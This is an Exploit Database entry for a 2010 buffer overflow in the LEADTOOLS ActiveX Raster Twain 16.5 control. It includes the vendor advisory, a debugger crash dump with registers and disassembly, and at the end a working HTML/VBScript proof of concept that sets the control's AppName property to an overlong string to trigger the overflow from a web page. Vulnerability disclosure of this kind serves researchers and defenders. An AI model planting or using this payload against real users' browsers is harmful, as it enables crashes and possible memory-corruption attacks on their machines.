LeadTools ActiveX Raster Twain 16.5 – ‘LtocxTwainu.dll’ Buffer Overflow (PoC)

• Exploit Database
• 12 阅读

• 作者： LiquidWorm
  日期： 2010-08-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14824/

• LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
  
  
  Vendor: LEAD Technologies, Inc.
  Product Web Page: http://www.leadtools.com
  Affected Version: 16.5.0.2
  
  Summary: With LEADTOOLS you can control any scanner, digital camera
  or capture card that has a TWAIN (32 and 64 bit) device driver.
  High-level acquisition support is included for ease of use while
  low-level functionality is provided for flexibility and control in
  even the most demanding scanning applications.
  
  Desc: The Raster Twain Object Library suffers from a buffer overflow
  vulnerability because it fails to check the boundry of the user input.
  
  
  Tested On: Microsoft Windows XP Professional SP3 (EN)
   Windows Internet Explorer 8.0.6001.18702
   RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
  
  
  ===============================================================
  
  (2c4.2624): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
  eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
  ntdll!wcscpy+0xe:
  7c912f4e 668901mov word ptr [ecx],axds:0023:01649000=????
  0:000> g
  (2c4.2624): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
  eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
  ntdll!RtlpNtMakeTemporaryKey+0x6a74:
  7c96c540 807b07ffcmp byte ptr [ebx+7],0FFhds:0023:00410040=??
  
  ==================================================================
  
  
  Registers:
  --------------------------------------------------
  EIP 7C912F4E
  EAX 00130041
  EBX 100255BC -> 10014840 -> Asc: @H@H
  ECX 01649000
  EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
  EDI 00000000
  ESI 0013EF6C -> BAAD0008
  EBP 0013EDA8 -> 0013EDDC
  ESP 0013EDA8 -> 0013EDDC
  
  --
  
  EIP 7C96C540
  EAX 00410039
  EBX 00410039
  ECX 00150000 -> 000000C8
  EDX 00150608 -> 7C97B5A0
  EDI 00410041
  ESI 00150000 -> 000000C8
  EBP 0013F228 -> 0013F278
  ESP 0013F220 -> 00150000
  
  
  ArgDump:
  --------------------------------------------------
  EBP+8	016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
  EBP+12	0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
  EBP+16	00000000
  EBP+20	0013EF6C -> BAAD0008
  EBP+24	100255BC -> 10014840 -> Asc: @H@H
  EBP+28	0013EDB8 -> 00000000
  
  --
  
  EBP+8	00150000 -> 000000C8
  EBP+12	00410039
  EBP+16	7C96DBA4 -> Asc: RtlGetUserInfoHeap
  EBP+20	00000000
  EBP+24	00410041
  EBP+28	7C80FF12 -> 9868146A
  
  
  CompanyName		LEAD Technologies, Inc.
  FileDescription		LEADTOOLS ActiveX Raster Twain (Win32)
  FileVersion		16,5,0,2
  InternalName		LTRTNU
  LegalCopyright		© 1991-2009 LEAD Technologies, Inc.
  OriginalFileName		LTRTNU.DLL
  ProductName		LEADTOOLS® for Win32
  ProductVersion		16.5.0.0
  
  
  Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
  RegKey Safe for Script: True
  RegKey Safe for Init: True
  Implements IObjectSafety: False
  
  
  Exception Code: ACCESS_VIOLATION
  
  Disasm: 7C912F4E	MOV [ECX],AX	(ntdll.dll)
  Disasm: 7C96C540	CMP BYTE PTR [EBX+7],FF	(ntdll.dll)
  
  
  Exception Code: BREAKPOINT
  
  Disasm: 7C90120E	INT3	(ntdll.dll)
  
  Seh Chain:
  --------------------------------------------------
  1 	7C839AC0 	KERNEL32.dll
  2 	FC2950 		VBSCRIPT.dll
  3 	7C90E900 	ntdll.dll
  
  
  7C912F4E	MOV [ECX],AX			<--- CRASH
  7C96C540	CMP BYTE PTR [EBX+7],FF		<--- CRASH
  7C90120F	RETN				<--- CRASH
  
  
  ==================================================================
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  liquidworm gmail com
  
  Zero Science Lab - http://www.zeroscience.mk
  
  24.08.2010
  
  
  Zero Science Lab Advisory ID: ZSL-2010-4960
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
  
  
  
  PoC:
  
  
  <object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
  <script language='vbscript'>
  
  targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
  prototype= "Property Let AppName As String"
  memberName = "AppName"
  progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
  argCount = 1
  
  arg1=String(9236, "A")
  
  target.AppName = arg1
  
  </script>